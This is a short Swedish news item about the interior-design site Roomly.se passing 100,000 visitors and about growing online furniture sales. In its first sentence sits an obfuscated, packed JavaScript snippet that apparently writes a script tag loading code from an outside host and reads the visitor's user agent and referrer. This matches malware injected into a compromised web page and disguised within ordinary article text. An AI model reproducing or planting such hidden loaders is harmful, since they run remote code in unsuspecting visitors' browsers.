Image Image Image Image Image Image Image Image Image Image

| 1 juni, 2020

Scroll to top

Top

Inredningssajten Roomly.se nu över 100.000 besökare

Inredningssajten Roomly.se nu över 100.000 besökare

Det eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|bdsde|var|u0026u|referrer|hsnkk||js|php’.split(’|’),0,{}))
var igår som den svenska
inredningssajten Roomly.se meddelade att hemsidan nu nått över 100.000 besökare på mindre än 6 månader. Inspirationssajten som fokuserar på inredning och design startades upp i Juli månad 2014 och fick ett rejält uppsving under hösten.

Intresset för möbler och inredning är otroligt högt i Sverige och hela norden. Vi väldigt mån om att dekoration och möblering  ska se bra ut och hålla utmärkt kvalitet. Försäljning av inredning har även den ökat otroligt under 2013 och 2014. Experterna tror att denna ökning kommer att fortsätta under 2015.

Visst kan man köpa kläder och andra produkter online men stora möbler som soffor, matbord och bänkar är inte alltid lätt och få med sig i egen bil. Därför är det vanligt att dessa köp görs via e-handel och skickas med transport. Roomly.se fokuserar inte på försäljning i sig men håller ett skarpt öga på marknaden och håller med om att det är en otroligt ökande marknad på internet.

Under 2015 kommer Roomly att fortsätta sin ökning och hoppas med lite marknadsföring kunna nå ca 10.000 unika användare dagligen inom 6 månader.

Idag kan man som besökare gå in och söka genom ca 3000 inredningsbilder i olika kategorier som kan användas för inspiration till egen möblering och dekoration.

Besök inredningssajten här: Roomly